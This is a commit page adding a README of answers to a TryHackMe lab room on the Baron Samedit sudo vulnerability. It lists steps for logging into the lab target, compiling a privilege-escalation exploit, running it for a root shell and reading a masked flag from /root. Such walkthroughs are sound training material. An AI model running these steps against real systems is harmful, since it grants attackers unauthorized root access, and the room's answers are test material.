We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
1 parent 20567be commit f867dd7Copy full SHA for f867dd7
Baron-Samedit/README.md
@@ -0,0 +1,20 @@
1
+# Baron Samedit
2
+
3
+- Deployed!
4
5
+ no answer needed
6
7
+- After compiling the exploit, what is the name of the executable created (blurred in the screenshots above)?
8
9
+ - `ssh tryhackme@<TARGET_IP>` and enter the password `tryhackme`
10
+ - `cd Exploit`
11
+ - `make`
12
+ - `sudo-h****************`
13
14
+- Run the exploit! You should now have a root shell -- what is the flag in /root/flag.txt?
15
16
+ - `cat /etc/os-release*`
17
+ - `./sudo-h**************** 0`
18
+ - `cd /root`
19
+ - `cat flag.txt`
20
+ - `THM{********************************}`
0 commit comments